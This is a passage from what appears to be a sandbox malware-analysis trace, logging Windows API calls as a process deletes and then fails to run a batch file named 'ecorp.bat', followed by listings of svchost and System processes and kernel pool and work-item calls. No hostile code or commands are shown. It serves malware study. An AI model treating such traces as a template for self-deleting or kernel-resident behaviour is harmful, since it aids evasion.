0x268a70 [0092.195] GetProcessHeap () returned 0x250000 [0092.195] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x2518c0 [0092.195] _wcsicmp (_String1="ecorp.bat", _String2=".") returned 55 [0092.195] _wcsicmp (_String1="ecorp.bat", _String2="..") returned 55 [0092.195] GetFileAttributesW (lpFileName="ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat")) returned 0x20 [0092.195] GetProcessHeap () returned 0x250000 [0092.195] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x218) returned 0x251b30 [0092.195] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x251b40 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.195] SetErrorMode (uMode=0x0) returned 0x0 [0092.196] SetErrorMode (uMode=0x1) returned 0x0 [0092.196] GetFullPathNameW (in: lpFileName="ecorp.bat", nBufferLength=0x104, lpBuffer=0x14d790, lpFilePart=0x14d780 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat", lpFilePart=0x14d780*="ecorp.bat") returned 0x2f [0092.196] SetErrorMode (uMode=0x0) returned 0x1 [0092.196] GetProcessHeap () returned 0x250000 [0092.196] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x26ef00 [0092.196] _wcsicmp (_String1="ecorp.bat", _String2=".") returned 55 [0092.196] _wcsicmp (_String1="ecorp.bat", _String2="..") returned 55 [0092.196] GetFileAttributesW (lpFileName="ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat")) returned 0x20 [0092.196] GetProcessHeap () returned 0x250000 [0092.196] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x24) returned 0x278ff0 [0092.196] GetProcessHeap () returned 0x250000 [0092.196] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x26ccf0 [0092.196] GetProcessHeap () returned 0x250000 [0092.196] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x26cd60 [0092.196] GetProcessHeap () returned 0x250000 [0092.196] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x810) returned 0x26f170 [0092.196] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat", fInfoLevelId=0x0, lpFindFileData=0x26f184, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f184) returned 0x251d50 [0092.196] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat")) returned 1 [0092.197] FindNextFileW (in: hFindFile=0x251d50, lpFindFileData=0x26f184 | out: lpFindFileData=0x26f184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4907b940, ftCreationTime.dwHighDateTime=0x18d1aee, ftLastAccessTime.dwLowDateTime=0x4907b940, ftLastAccessTime.dwHighDateTime=0x18d1aee, ftLastWriteTime.dwLowDateTime=0x4907b940, ftLastWriteTime.dwHighDateTime=0x18d1aee, nFileSizeHigh=0x0, nFileSizeLow=0x51, dwReserved0=0x0, dwReserved1=0x0, cFileName="ecorp.bat", cAlternateFileName="")) returned 0 [0092.197] GetLastError () returned 0x12 [0092.197] FindClose (in: hFindFile=0x251d50 | out: hFindFile=0x251d50) returned 1 [0092.197] GetProcessHeap () returned 0x250000 [0092.197] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26f170 | out: hHeap=0x250000) returned 1 [0092.197] GetProcessHeap () returned 0x250000 [0092.197] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cd60 | out: hHeap=0x250000) returned 1 [0092.197] GetProcessHeap () returned 0x250000 [0092.197] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278ff0 | out: hHeap=0x250000) returned 1 [0092.197] GetProcessHeap () returned 0x250000 [0092.197] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0092.197] GetProcessHeap () returned 0x250000 [0092.197] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ef00 | out: hHeap=0x250000) returned 1 [0092.197] GetProcessHeap () returned 0x250000 [0092.197] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251b30 | out: hHeap=0x250000) returned 1 [0092.197] GetProcessHeap () returned 0x250000 [0092.197] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2518c0 | out: hHeap=0x250000) returned 1 [0092.197] GetProcessHeap () returned 0x250000 [0092.197] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268a70 | out: hHeap=0x250000) returned 1 [0092.197] GetProcessHeap () returned 0x250000 [0092.198] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268a10 | out: hHeap=0x250000) returned 1 [0092.198] GetProcessHeap () returned 0x250000 [0092.198] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278fc0 | out: hHeap=0x250000) returned 1 [0092.198] GetProcessHeap () returned 0x250000 [0092.198] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278f90 | out: hHeap=0x250000) returned 1 [0092.198] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.198] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0092.198] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.198] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0092.198] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.198] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0092.198] SetConsoleInputExeNameW () returned 0x1 [0092.198] GetConsoleOutputCP () returned 0x1b5 [0092.198] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0092.198] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0092.199] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0092.199] GetLastError () returned 0x2 [0092.199] _get_osfhandle (_FileHandle=2) returned 0xb [0092.199] GetFileType (hFile=0xb) returned 0x2 [0092.200] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0092.200] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14eed8 | out: lpMode=0x14eed8) returned 1 [0092.200] _get_osfhandle (_FileHandle=2) returned 0xb [0092.200] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14ef10 | out: lpConsoleScreenBufferInfo=0x14ef10) returned 1 [0092.200] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236c, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The batch file cannot be found.\r\n") returned 0x21 [0092.200] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236c, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x14ef80 | out: lpBuffer="The batch file cannot be found.\r\n") returned 0x21 [0092.200] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x21, lpNumberOfCharsWritten=0x14ef00, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef00*=0x21) returned 1 [0092.201] CmdBatNotification () returned 0x0 [0092.201] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.201] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0092.201] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.201] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0092.201] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.201] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0092.201] SetConsoleInputExeNameW () returned 0x1 [0092.201] GetConsoleOutputCP () returned 0x1b5 [0092.201] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0092.201] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0092.202] exit (_Code=1) Process: id = "23" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x910c000" os_pid = "0x124" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "rpc_server" parent_id = "11" os_parent_pid = "0x3f8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e1c4" [0xc000000f], "LOCAL" [0x7] Thread: id = 167 os_tid = 0xad0 Thread: id = 168 os_tid = 0x998 Thread: id = 169 os_tid = 0x958 Thread: id = 170 os_tid = 0x754 Thread: id = 171 os_tid = 0x704 Thread: id = 172 os_tid = 0x6e0 Thread: id = 173 os_tid = 0x6b0 Thread: id = 174 os_tid = 0x698 Thread: id = 175 os_tid = 0x678 Thread: id = 176 os_tid = 0x630 Thread: id = 177 os_tid = 0x610 Thread: id = 178 os_tid = 0x14c Thread: id = 179 os_tid = 0x140 Thread: id = 180 os_tid = 0x158 Thread: id = 181 os_tid = 0x294 Thread: id = 182 os_tid = 0x218 Thread: id = 183 os_tid = 0x230 Thread: id = 184 os_tid = 0x21c Thread: id = 185 os_tid = 0x1c4 Thread: id = 220 os_tid = 0x844 Thread: id = 225 os_tid = 0x830 Thread: id = 226 os_tid = 0xb64 Thread: id = 227 os_tid = 0xb54 Process: id = "24" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x8bed000" os_pid = "0x334" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ba6f" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 186 os_tid = 0xa1c Thread: id = 187 os_tid = 0x960 Thread: id = 188 os_tid = 0x58c Thread: id = 189 os_tid = 0x658 Thread: id = 190 os_tid = 0x584 Thread: id = 191 os_tid = 0x728 Thread: id = 192 os_tid = 0x674 Thread: id = 193 os_tid = 0x65c Thread: id = 194 os_tid = 0x144 Thread: id = 195 os_tid = 0x118 Thread: id = 196 os_tid = 0x3ec Thread: id = 197 os_tid = 0x3e0 Thread: id = 198 os_tid = 0x3dc Thread: id = 199 os_tid = 0x3cc Thread: id = 200 os_tid = 0x3c8 Thread: id = 201 os_tid = 0x388 Thread: id = 202 os_tid = 0x384 Thread: id = 203 os_tid = 0x380 Thread: id = 204 os_tid = 0x37c Thread: id = 205 os_tid = 0x364 Thread: id = 206 os_tid = 0x360 Thread: id = 207 os_tid = 0x34c Thread: id = 208 os_tid = 0x338 Thread: id = 218 os_tid = 0x854 Process: id = "25" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "kernel_analysis" parent_id = "0" os_parent_pid = "0x0" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 231 os_tid = 0x8 Thread: id = 232 os_tid = 0xc4 Thread: id = 233 os_tid = 0xb0 Thread: id = 234 os_tid = 0x9c Thread: id = 235 os_tid = 0x78 Thread: id = 236 os_tid = 0xc0 Thread: id = 237 os_tid = 0x28 Thread: id = 238 os_tid = 0x40 Thread: id = 239 os_tid = 0x3c Thread: id = 240 os_tid = 0x38 Thread: id = 241 os_tid = 0x5c Thread: id = 242 os_tid = 0x34 [0229.767] ExAllocatePoolWithTag (PoolType=0x0, NumberOfBytes=0x1d191, Tag=0x6e477459) returned 0xfffffa80019ca000 Thread: id = 243 os_tid = 0x4c Thread: id = 244 os_tid = 0x30 Thread: id = 245 os_tid = 0xcc Thread: id = 246 os_tid = 0x48 Thread: id = 247 os_tid = 0xd0 Thread: id = 248 os_tid = 0xb8 Thread: id = 249 os_tid = 0xd4 Thread: id = 250 os_tid = 0xd8 Thread: id = 251 os_tid = 0xdc Thread: id = 252 os_tid = 0xe8 Thread: id = 253 os_tid = 0xec Thread: id = 254 os_tid = 0x64 Thread: id = 255 os_tid = 0x2c Thread: id = 256 os_tid = 0xfc Thread: id = 257 os_tid = 0x104 Thread: id = 258 os_tid = 0x114 Thread: id = 259 os_tid = 0x108 Thread: id = 260 os_tid = 0x80 Thread: id = 261 os_tid = 0x88 Thread: id = 262 os_tid = 0x8c Thread: id = 263 os_tid = 0x10c Thread: id = 264 os_tid = 0x12c Thread: id = 265 os_tid = 0x130 Thread: id = 266 os_tid = 0x134 Thread: id = 267 os_tid = 0x138 Thread: id = 268 os_tid = 0x174 Thread: id = 269 os_tid = 0x84 Thread: id = 270 os_tid = 0x90 Thread: id = 271 os_tid = 0x100 Thread: id = 272 os_tid = 0x98 Thread: id = 273 os_tid = 0x74 Thread: id = 274 os_tid = 0x268 Thread: id = 275 os_tid = 0x68 Thread: id = 276 os_tid = 0x24 Thread: id = 277 os_tid = 0x2e4 Thread: id = 278 os_tid = 0x3b4 Thread: id = 279 os_tid = 0x444 Thread: id = 280 os_tid = 0x458 Thread: id = 281 os_tid = 0x94 Thread: id = 282 os_tid = 0x558 Thread: id = 283 os_tid = 0x590 Thread: id = 284 os_tid = 0x598 Thread: id = 285 os_tid = 0x5e0 Thread: id = 286 os_tid = 0x604 Thread: id = 287 os_tid = 0x698 Thread: id = 288 os_tid = 0x6a8 Thread: id = 289 os_tid = 0x6bc Thread: id = 290 os_tid = 0x6cc Thread: id = 291 os_tid = 0x6d0 Thread: id = 292 os_tid = 0x6d8 Thread: id = 293 os_tid = 0x20 Thread: id = 294 os_tid = 0x460 Thread: id = 295 os_tid = 0x780 Thread: id = 296 os_tid = 0x1c Thread: id = 297 os_tid = 0x45c Thread: id = 298 os_tid = 0x7cc Thread: id = 299 os_tid = 0x4d0 Thread: id = 300 os_tid = 0x0 [0229.764] ExQueueWorkItem (in: WorkItem=0xfffffa80019883b6*(List.Flink=0x0, List.Blink=0x0, WorkerRoutine=0xfffffa800198cf9b, Parameter=0xfffffa8001988176), QueueType=0x1 | out: WorkItem=0xfffffa80019883b6*(List.Flink=0x0, List.Blink=0x0, WorkerRoutine=0xfffffa800198cf9b, Parameter=0xfffffa8001988176)) Thread: id = 301 os_tid = 0x538 Thread: id = 302 os_tid = 0x638 Thread: id = 303 os_tid = 0xbc Thread: id = 304 os_tid = 0x678 Thread: id = 305 os_tid = 0x788 Thread: id = 306 os_tid = 0x60 Thread: id = 307 os_tid = 0x784 Thread: id = 308 os_tid = 0x79c Thread: id = 309 os_tid = 0x598 Thread: id = 310 os_tid = 0x7e8 Thread: id = 311 os_tid = 0x5e0 Thread: id = 312 os_tid = 0x4d0 Thread: id = 313 os_tid = 0xa0 Thread: id = 314 os_tid = 0x61c Thread: id = 315 os_tid = 0x55c Thread: id = 316 os_tid = 0x790 Thread: id = 317 os_tid = 0x798 Thread: id = 318 os_tid = 0x30c Thread: id = 319 os_tid = 0x6e8 Thread: id = 320 os_tid = 0x788 Thread: id = 321 os_tid = 0x79c Thread: id = 322 os_tid = 0x59c Thread: id = 323 os_tid = 0x5d8 Thread: id = 324 os_tid = 0x650 Thread: id = 325 os_tid = 0x55c Thread: id = 326 os_tid = 0x218 Thread: id = 327 os_tid = 0x6a0 Thread: id = 328 os_tid = 0x30c Thread: id = 329 os_tid = 0x224 Thread: id = 330 os_tid = 0x744 Thread: id = 331 os_tid = 0xb0 Thread: id = 332 os_tid = 0xc0 Thread: id = 333 os_tid = 0x218 Thread: id = 334 os_tid = 0xcc Thread: id = 335 os_tid = 0x300 Thread: id = 336 os_tid = 0x720 Thread: id = 337 os_tid = 0x6e8